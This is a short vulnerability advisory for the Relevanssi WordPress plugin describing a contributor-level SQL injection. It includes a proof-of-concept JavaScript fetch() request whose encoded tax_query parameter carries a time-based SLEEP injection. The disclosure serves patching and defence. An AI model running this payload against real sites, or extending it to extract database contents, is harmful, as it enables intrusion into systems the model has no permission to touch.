Relevanssi (Free < 4.26.0, Premium < 2.29.0) – Contributor+ SQLi | CVE 2025-14719

Description

The plugins do not sanitize and escape a parameter before using it in a SQL statement, allowing contributor and above roles to perform SQL injection attacks

Proof of Concept

Log in as a contributor, go to the following URL https://example.com/wp-admin/?page=relevanssi_admin_search, submit the below in the web developer console and notice the 10s response delay:

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=relevanssi_admin_search&args=tax_query%255B0%255D%255Boperator%255D%3Dexists%26tax_query%255B0%255D%255Btaxonomy%255D%3D%2527) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND (%2527x%2527=%2527Sx&security=' + nonce.searching_nonce,
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));